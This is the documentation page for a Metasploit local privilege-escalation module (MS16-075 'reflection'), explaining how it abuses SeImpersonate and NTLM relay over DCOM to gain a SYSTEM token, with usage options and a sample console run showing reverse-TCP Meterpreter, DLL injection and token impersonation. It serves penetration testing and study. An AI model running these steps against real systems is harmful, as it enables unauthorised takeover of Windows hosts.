adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
c48a6ddbdfc02bf92b8d4e247dbe89bdfba4e821
metasploit-gs/documentation/modules/exploit/windows/local/ms16_reflection.md
T

56 lines
2.8 KiB
Markdown
Raw Blame History

## Intro
This module will abuse the SeImperonsate privilege commonly found in
services due to the requirement to impersonate a client upon
authentication. As such it is possible to impersonate the SYSTEM account
and relay its NTLM hash to RPC via DCOM. The DLL will perform a MiTM
attack at which intercepts the hash and relay responses from RPC to be
able to establish a handle to a new SYSTEM token. Some caveats : Set
your target option to match the architecture of your Meterpreter
session, else it will inject the wrong architecture DLL into the process
of a seperate architecture. Additionally, after you have established a
session, you must use incognito to imperonsate the SYSTEM Token.
## Usage
You'll first need to obtain a session on the target system.
Next, once the module is loaded, one simply needs to set the
```payload``` and ```session``` options, in addition to architecture.
Your user at which you are trying to exploit must have `SeImpersonate`
privileges.
The module has a hardcoded timeout of 20 seconds, as the attack may
not work immediately and take a few seconds to start. Also, check to
make sure port 6666 is inherently not in use else the exploit will not
run properly
## Scenario
```
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 48 yes The session to run this module on. Payload options
(windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread,
process, none)
LHOST ens3 yes The listen address (an interface may be specified)
LPORT 3312 yes The listen port Exploit target:
Id Name
-- ----
1 Windows x64 msf exploit(windows/local/ms16_075_reflection) > run
[*] Started reverse TCP handler on -snip-:3312 [*] Launching notepad to
host the exploit... [+] Process 3564 launched. [*] Reflectively
injecting the exploit DLL into 3564... [*] Injecting exploit into
3564... [*] Exploit injected. Injecting payload into 3564... [*] Payload
injected. Executing exploit... [+] Exploit finished, wait for (hopefully
privileged) payload execution to complete. [*] Sending stage (206403
bytes) to -snip- [*] Meterpreter session 49 opened (-snip-:3312 ->
-snip-:55306) at 2018-08-03 01:54:18 -0400 meterpreter > load incognito
Loading extension incognito...Success. meterpreter > impersonate_token
'NT AUTHORITY\SYSTEM' [-] Warning: Not currently running as SYSTEM, not
all tokens will be available
Call rev2self if primary process token is SYSTEM [-] No
delegation token available [+] Successfully impersonated user NT
AUTHORITY\SYSTEM meterpreter > getsystem -t 1 ...got system via
technique 1 (Named Pipe Impersonation (In Memory/Admin)). meterpreter >
```
Reference in New Issue View Git Blame Copy Permalink